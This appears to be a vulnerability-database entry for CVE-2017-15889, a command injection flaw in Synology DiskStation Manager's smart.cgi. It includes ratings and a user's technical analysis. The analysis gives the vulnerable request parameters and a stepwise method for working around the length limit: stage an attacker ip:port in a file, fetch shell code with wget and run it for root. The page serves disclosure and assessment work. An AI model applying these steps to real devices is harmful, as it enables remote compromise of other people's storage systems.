Attacker Value
Very High
(1 user assessed)
Exploitability
Low
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
0

CVE-2017-15889

Disclosure Date: December 04, 2017
Add any MITRE ATT&CK Tactics to the list below that apply to this CVE.

Description

Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.

Add Assessment

2
Ratings
Technical Analysis

AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi through either a GET or POST request.
Variables for the request look as such:

        'action' => 'apply',
        'operation' => 'quick',
        'disk' => "/dev/sda"

The disk field is vulnerable. However, that’s just where this fun begins. The disk field is required to be ‘semi’ disk correct. AKA you can’t just have nothing there, or a, however /dev/sd did seem to work. Next, when the command is passed off, the entire disk field is limited to 30 characters. After shortening to /dev/sd and then adding ticks (‘`’) you are left with 22 characters. Pretty tight spacing.

To circumvent this restriction, the following was done:

  1. in < 22 characters, echo -n and ip:port to a file (/a).
  2. use wget -i /a -O <file> to then pull back shell code from a attacker controlled HTTP server
  3. execute the payload

Most likely step 1 will need to be done in > 1 steps.

Exploitation grants root privileges.

General Information

Vendors

  • Synology

Products

  • DiskStation Manager (DSM)

Additional Info

Technical Analysis